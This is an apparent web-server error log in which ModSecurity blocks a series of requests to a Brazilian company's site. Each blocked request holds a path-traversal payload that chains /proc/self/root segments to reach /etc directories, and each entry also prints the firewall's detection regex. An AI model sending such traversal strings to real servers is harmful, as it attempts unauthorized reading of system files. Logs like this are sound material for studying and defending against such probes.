[Mon Mar 16 13:05:25.761405 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.243.203:45940] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqRbABkC4fWIHEf8HtRgAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:27.104856 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.243.203:45946] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqR7ysWC90G-1nBrBHKwAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:28.386787 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.243.203:45960] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqSNSswJuvopo3lOhhOgAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:29.662823 2026] [:error] [pid 10709:tid 140411658000128] [client 74.7.243.203:45968] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqSRXjF1vJNtV6CWr4QwAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:30.983053 2026] [:error] [pid 21533:tid 140411565680384] [client 74.7.243.203:42984] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqSnjZBu2q05ozVU9aIgAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:33.348877 2026] [:error] [pid 32654:tid 140411683178240] [client 74.7.243.203:42988] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqTQlT9VtDQc7bgUy1UQAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:37.766011 2026] [:error] [pid 21533:tid 140411616036608] [client 74.7.243.203:42990] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqUXjZBu2q05ozVU9aLQAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:39.111035 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.243.203:42992] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqU_9ocpUE4ed4uDzwyAAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:40.265341 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.243.203:48688] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqVNSswJuvopo3lOhhQQAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:41.630785 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.243.203:48696] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqVdSswJuvopo3lOhhQgAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:44.230263 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.243.203:48706] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqWNSswJuvopo3lOhhRAAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:45.532904 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.243.203:48722] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqWbABkC4fWIHEf8HtYQAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:46.685067 2026] [:error] [pid 10651:tid 140411599251200] [client 74.7.243.203:48732] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqWrysWC90G-1nBrBHLQAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:47.963017 2026] [:error] [pid 32654:tid 140411557287680] [client 74.7.243.203:48736] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqWwlT9VtDQc7bgUy1VwAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:48.355683 2026] [:error] [pid 21533:tid 140411565680384] [client 74.7.241.46:53870] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqXHjZBu2q05ozVU9aOQAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:05:49.234058 2026] [:error] [pid 10709:tid 140411624429312] [client 74.7.243.203:48738] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqXRXjF1vJNtV6CWr4RgAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:50.502801 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.243.203:47118] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqXtSswJuvopo3lOhhRQAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:51.843072 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.243.203:47130] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqX7ABkC4fWIHEf8HtZwAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:53.699180 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.243.203:47140] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqYbABkC4fWIHEf8HtaAAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:54.965954 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.243.203:47148] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqYo6lpbStxTqkSktuSAAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:57.431207 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.243.203:47162] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqZP9ocpUE4ed4uDzw2gAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
